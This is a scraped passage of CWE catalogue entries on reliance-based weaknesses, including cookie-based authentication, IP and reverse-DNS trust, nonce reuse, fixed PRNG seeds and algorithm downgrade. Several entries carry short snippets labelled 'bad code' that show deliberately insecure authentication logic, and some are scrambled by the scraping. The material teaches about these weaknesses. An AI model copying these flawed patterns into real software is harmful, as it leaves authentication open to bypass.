Attackers can easily modify cookies, within the browser or by implementing the client-side code outside of the browser. Attackers can bypass protection mechanisms such as authorization and authentication by modifying the cookie to contain an expected value.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt reads a value from a browser cookie to determine the role of the user. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("role")) { userRole = c.getValue(); }Example 2 The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. (bad code)
Example Language: PHP
$auth = $_COOKIES['authenticated'];
if (! $auth) { if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") { }// save the cookie to send out in future responses }setcookie("authenticated", "1", time()+60*60*2); else { ShowLoginScreen(); }die("\n"); DisplayMedicalHistory($_POST['patient_ID']); The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. Example 3 In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) { authenticated = true; }Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
A new parent might need to be defined for this entry. This entry is specific to cookies, which reflects the significant number of vulnerabilities being reported for cookie-based authentication in CVE during 2008 and 2009. However, other types of inputs - such as parameters or headers - could also be used for similar authentication or authorization. Similar issues (under the Research view) include CWE-247 and CWE-472.
CWE-646: Reliance on File Name or Extension of Externally-Supplied File
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product allows a file to be uploaded, but it relies on the file name or extension of the file to determine the appropriate behaviors. This could be used by attackers to cause the file to be misclassified and processed in a dangerous fashion.
An application might use the file name or extension of a user-supplied file to determine the proper course of action, such as selecting the correct process to which control should be passed, deciding what data should be made available, or what resources should be allocated. If the attacker can cause the code to misclassify the supplied file, then the wrong action could occur. For example, an attacker could supply a file that ends in a ".php.gif" extension that appears to be a GIF image, but would be processed as PHP code. In extreme cases, code execution is possible, but the attacker could also cause exhaustion of resources, denial of service, exposure of debug or system data (including application source code), or being bound to a particular server side process. This weakness may be due to a vulnerability in any of the technologies used by the web and application servers, due to misconfiguration, or resultant from another flaw in the application itself.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-291: Reliance on IP Address for Authentication
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter
IP addresses can be easily spoofed. Attackers can forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 Both of these examples check if a request is from a trusted address before responding to the request. (bad code)
Example Language: C
sd = socket(AF_INET, SOCK_DGRAM, 0);
serv.sin_family = AF_INET; serv.sin_addr.s_addr = htonl(INADDR_ANY); servr.sin_port = htons(1008); bind(sd, (struct sockaddr *) & serv, sizeof(serv)); while (1) { memset(msg, 0x0, MAX_MSG); }clilen = sizeof(cli); if (inet_ntoa(cli.sin_addr)==getTrustedAddress()) { n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); }(bad code)
Example Language: Java
while(true) {
DatagramPacket rp=new DatagramPacket(rData,rData.length);
outSock.receive(rp); String in = new String(p.getData(),0, rp.getLength()); InetAddress clientIPAddress = rp.getAddress(); int port = rp.getPort(); if (isTrustedAddress(clientIPAddress) & secretKey.equals(in)) { out = secret.getBytes(); }DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp); The code only verifies the address as stored in the request packet. An attacker can spoof this address, thus impersonating a trusted client. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-350: Reliance on Reverse DNS Resolution for a Security-Critical Action
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product performs reverse DNS resolution on an IP address to obtain the hostname and make a security decision, but it does not properly ensure that the IP address is truly associated with the hostname.
Since DNS names can be easily spoofed or misreported, and it may be difficult for the product to detect if a trusted DNS server has been compromised, DNS names do not constitute a valid authentication mechanism. When the product performs a reverse DNS resolution for an IP address, if an attacker controls the DNS server for that IP address, then the attacker can cause the server to return an arbitrary hostname. As a result, the attacker may be able to bypass authentication, cause the wrong hostname to be recorded in log files to hide activities, or perform other attacks. Attackers can spoof DNS names by either (1) compromising a DNS server and modifying its records (sometimes called DNS cache poisoning), or (2) having legitimate control over a DNS server associated with their IP address. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. (bad code)
Example Language: C
struct hostent *hp;struct in_addr myaddr;
char* tHost = "trustme.example.com"; myaddr.s_addr=inet_addr(ip_addr_string); hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET); if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) { trusted = true; } else {trusted = false; }(bad code)
Example Language: Java
String ip = request.getRemoteAddr();
InetAddress addr = InetAddress.getByName(ip); if (addr.getCanonicalHostName().endsWith("trustme.com")) { trusted = true; }(bad code)
Example Language: C#
IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);
IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); if (hostInfo.HostName.EndsWith("trustme.com")) { trusted = true; }IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. Example 2 In these examples, a connection is established if a request is made by a trusted host. (bad code)
Example Language: C
sd = socket(AF_INET, SOCK_DGRAM, 0);
serv.sin_family = AF_INET; serv.sin_addr.s_addr = htonl(INADDR_ANY); servr.sin_port = htons(1008); bind(sd, (struct sockaddr *) & serv, sizeof(serv)); while (1) { memset(msg, 0x0, MAX_MSG); clilen = sizeof(cli); h=gethostbyname(inet_ntoa(cliAddr.sin_addr)); if (h->h_name==...) n = recvfrom(sd, msg, MAX_MSG, 0, (struct sockaddr *) & cli, &clilen); (bad code)
Example Language: Java
while(true) {
DatagramPacket rp=new DatagramPacket(rData,rData.length);
outSock.receive(rp); String in = new String(p.getData(),0, rp.getLength()); InetAddress IPAddress = rp.getAddress(); int port = rp.getPort(); if ((rp.getHostName()==...) & (in==...)) { out = secret.getBytes(); DatagramPacket sp =new DatagramPacket(out,out.length, IPAddress, port); outSock.send(sp); These examples check if a request is from a trusted host before responding to a request, but the code only verifies the hostname as stored in the request packet. An attacker can spoof the hostname, thus impersonating a trusted client. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-656: Reliance on Security Through Obscurity
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a protection mechanism whose strength depends heavily on its obscurity, such that knowledge of its algorithms or key data is sufficient to defeat the mechanism.
This reliance on "security through obscurity" can produce resultant weaknesses if an attacker is able to reverse engineer the inner workings of the mechanism. Note that obscurity can be one small part of defense in depth, since it can create more work for an attacker; however, it is a significant risk if used as the primary means of protection.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The design of TCP relies on the secrecy of Initial Sequence Numbers (ISNs), as originally covered in CVE-1999-0077 [REF-542]. If ISNs can be guessed (due to predictability, CWE-330) or sniffed (due to lack of encryption during transmission, CWE-312), then an attacker can hijack or spoof connections. Many TCP implementations have had variations of this problem over the years, including CVE-2004-0641, CVE-2002-1463, CVE-2001-0751, CVE-2001-0328, CVE-2001-0288, CVE-2001-0163, CVE-2001-0162, CVE-2000-0916, and CVE-2000-0328.
Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
Note that there is a close relationship between this weakness and CWE-603 (Use of Client-Side Authentication). If developers do not believe that a user can reverse engineer a client, then they are more likely to choose client-side authentication in the belief that it is safe.
CWE-807: Reliance on Untrusted Inputs in a Security Decision
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterThe product uses a protection mechanism that relies on the existence or values of an input, but the input can be modified by an untrusted actor in a way that bypasses the protection mechanism.
Developers may assume that inputs such as cookies, environment variables, and hidden form fields cannot be modified. However, an attacker could change these inputs using customized clients or other attacks. This change might not be detected. When security decisions such as authentication and authorization are made based on the values of these inputs, attackers can bypass the security of the software. Without sufficient encryption, integrity checking, or other mechanism, any input that originates from an outsider cannot be trusted. This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code excerpt reads a value from a browser cookie to determine the role of the user. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("role")) { userRole = c.getValue(); }Example 2 The following code could be for a medical records application. It performs authentication by checking if a cookie has been set. (bad code)
Example Language: PHP
$auth = $_COOKIES['authenticated'];
if (! $auth) { if (AuthenticateUser($_POST['user'], $_POST['password']) == "success") { }// save the cookie to send out in future responses }setcookie("authenticated", "1", time()+60*60*2); else { ShowLoginScreen(); }die("\n"); DisplayMedicalHistory($_POST['patient_ID']); The programmer expects that the AuthenticateUser() check will always be applied, and the "authenticated" cookie will only be set when authentication succeeds. The programmer even diligently specifies a 2-hour expiration for the cookie. However, the attacker can set the "authenticated" cookie to a non-zero value such as 1. As a result, the $auth variable is 1, and the AuthenticateUser() check is not even performed. The attacker has bypassed the authentication. Example 3 In the following example, an authentication flag is read from a browser cookie, thus allowing for external control of user state data. (bad code)
Example Language: Java
Cookie[] cookies = request.getCookies();
for (int i =0; i< cookies.length; i++) { Cookie c = cookies[i]; }if (c.getName().equals("authenticated") && Boolean.TRUE.equals(c.getValue())) { authenticated = true; }Example 4 The following code samples use a DNS lookup in order to decide whether or not an inbound request is from a trusted host. If an attacker can poison the DNS cache, they can gain trusted status. (bad code)
Example Language: C
struct hostent *hp;struct in_addr myaddr;
char* tHost = "trustme.example.com"; myaddr.s_addr=inet_addr(ip_addr_string); hp = gethostbyaddr((char *) &myaddr, sizeof(struct in_addr), AF_INET); if (hp && !strncmp(hp->h_name, tHost, sizeof(tHost))) { trusted = true; } else {trusted = false; }(bad code)
Example Language: Java
String ip = request.getRemoteAddr();
InetAddress addr = InetAddress.getByName(ip); if (addr.getCanonicalHostName().endsWith("trustme.com")) { trusted = true; }(bad code)
Example Language: C#
IPAddress hostIPAddress = IPAddress.Parse(RemoteIpAddress);
IPHostEntry hostInfo = Dns.GetHostByAddress(hostIPAddress); if (hostInfo.HostName.EndsWith("trustme.com")) { trusted = true; }IP addresses are more reliable than DNS names, but they can also be spoofed. Attackers can easily forge the source IP address of the packets they send, but response packets will return to the forged IP address. To see the response packets, the attacker has to sniff the traffic between the victim machine and the forged IP address. In order to accomplish the required sniffing, attackers typically attempt to locate themselves on the same subnet as the victim machine. Attackers may be able to circumvent this requirement by using source routing, but source routing is disabled across much of the Internet today. In summary, IP address verification can be a useful part of an authentication scheme, but it should not be the single factor required for authentication. Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-509: Replicating Malicious Code (Virus or Worm)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterReplicating malicious code, including viruses and worms, will attempt to attack other systems once it has successfully compromised the target system or the product.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Relationship
It is suspected that malicious
code can often be characterized using other "regular"
weaknesses related to insecure behavior. However, this has
not been closely investigated.
CWE-323: Reusing a Nonce, Key Pair in Encryption
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom Filter This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Software Development" (View-699)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 This code takes a password, concatenates it with a nonce, then encrypts it before sending over a network: (bad code)
Example Language: C
void encryptAndSendPassword(char *password){
char *nonce = "bad"; }... char *data = (unsigned char*)malloc(20); int para_size = strlen(nonce) + strlen(password); char *paragraph = (char*)malloc(para_size); SHA1((const unsigned char*)paragraph,parsize,(unsigned char*)data); sendEncryptedData(data) Because the nonce used is always the same, an attacker can impersonate a trusted party by intercepting and resending the encrypted password. This attack avoids the need to learn the unencrypted password. Example 2 This code sends a command to a remote server, using an encrypted password and nonce to prove the command is from a trusted party: (bad code)
Example Language: C++
String command = new String("some command to execute");
MessageDigest nonce = MessageDigest.getInstance("SHA"); nonce.update(String.valueOf("bad nonce")); byte[] nonce = nonce.digest(); MessageDigest password = MessageDigest.getInstance("SHA"); password.update(nonce + "secretPassword"); byte[] digest = password.digest(); sendCommand(digest, command) Once again the nonce used is always the same. An attacker may be able to replay previous legitimate commands or execute new arbitrary commands.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
CWE-336: Same Seed in Pseudo-Random Number Generator (PRNG)
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA Pseudo-Random Number Generator (PRNG) uses the same seed each time the product is initialized.
Given the deterministic nature of PRNGs, using the same seed for each initialization will lead to the same output in the same order. If an attacker can guess (or knows) the seed, then the attacker may be able to determine the random numbers that will be produced from the PRNG.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
weakness could appear. These
may be for specific named Languages, Operating Systems, Architectures, Paradigms,
Technologies,
or a class of such platforms. The platform is listed along with how frequently the given
weakness appears for that instance.
Example 1 The following code uses a statistical PRNG to generate account IDs. (bad code)
Example Language: Java
private static final long SEED = 1234567890;
public int generateAccountID() { Random random = new Random(SEED); }return random.nextInt(); Because the program uses the same seed value for every invocation of the PRNG, its values are predictable, making the system vulnerable to attack. Example 2 This code attempts to generate a unique random identifier for a user's session. (bad code)
Example Language: PHP
function generateSessionID($userID){
srand($userID); }return rand(); Because the seed for the PRNG is always the user's ID, the session ID will always be the same. An attacker could thus predict any user's session ID and potentially hijack the session. If the user IDs are generated sequentially, or otherwise restricted to a narrow range of values, then this example also exhibits a Small Seed Space (CWE-339). Note: this is a curated list of examples for users to understand the variety of ways in which this weakness can be introduced. It is not a complete list of all CVEs that are related to this CWE entry.
This MemberOf Relationships table shows additional CWE Categories and Views that
reference this weakness as a member. This information is often useful in understanding where a
weakness fits within the context of external information sources.
Maintenance
As of CWE 4.5, terminology related to randomness, entropy, and
predictability can vary widely. Within the developer and other
communities, "randomness" is used heavily. However, within
cryptography, "entropy" is distinct, typically implied as a
measurement. There are no commonly-used definitions, even within
standards documents and cryptography papers. Future versions of
CWE will attempt to define these terms and, if necessary,
distinguish between them in ways that are appropriate for
different communities but do not reduce the usability of CWE for
mapping, understanding, or other scenarios.
CWE-757: Selection of Less-Secure Algorithm During Negotiation ('Algorithm Downgrade')
View customized information:
For users who are interested in more notional aspects of a weakness. Example: educators, technical writers, and project/program managers.
For users who are concerned with the practical application and details about the nature of a weakness and how to prevent it from happening. Example: tool developers, security researchers, pen-testers, incident response analysts.
For users who are mapping an issue to CWE/CAPEC IDs, i.e., finding the most appropriate CWE for a specific issue (e.g., a CVE record). Example: tool developers, security researchers.
For users who wish to see all available information for the CWE/CAPEC entry.
For users who want to customize what details are displayed.
×
Edit Custom FilterA protocol or its implementation supports interaction between multiple actors and allows those actors to negotiate which algorithm should be used as a protection mechanism such as encryption or authentication, but it does not select the strongest algorithm that is available to both parties.
When a security mechanism can be forced to downgrade to use a less secure algorithm, this can make it easier for attackers to compromise the product by exploiting weaker algorithm. The victim might not be aware that the less secure algorithm is being used. For example, if an attacker can force a communications channel to use cleartext instead of strongly-encrypted data, then the attacker could read the channel by sniffing, instead of going through extra effort of trying to decrypt the data using brute force techniques.
This table specifies different individual consequences
associated with the weakness. The Scope identifies the application security area that is
violated, while the Impact describes the negative technical impact that arises if an
adversary succeeds in exploiting this weakness. The Likelihood provides information about
how likely the specific consequence is expected to be seen relative to the other
consequences in the list. For example, there may be high likelihood that a weakness will be
exploited to achieve a certain impact, but a low likelihood that it will be exploited to
achieve a different impact.
This table shows the weaknesses and high level categories that are related to this
weakness. These relationships are defined as ChildOf, ParentOf, MemberOf and give insight to
similar items that may exist at higher and lower levels of abstraction. In addition,
relationships such as PeerOf and CanAlsoBe are defined to show similar weaknesses that the user
may want to explore.
Relevant to the view "Research Concepts" (View-1000)
Relevant to the view "Architectural Concepts" (View-1008)
The different Modes of Introduction provide information
about how and when this
weakness may be introduced. The Phase identifies a point in the life cycle at which
introduction
may occur, while the Note provides a typical scenario related to introduction during the
given
phase.
This listing shows possible areas for which the given
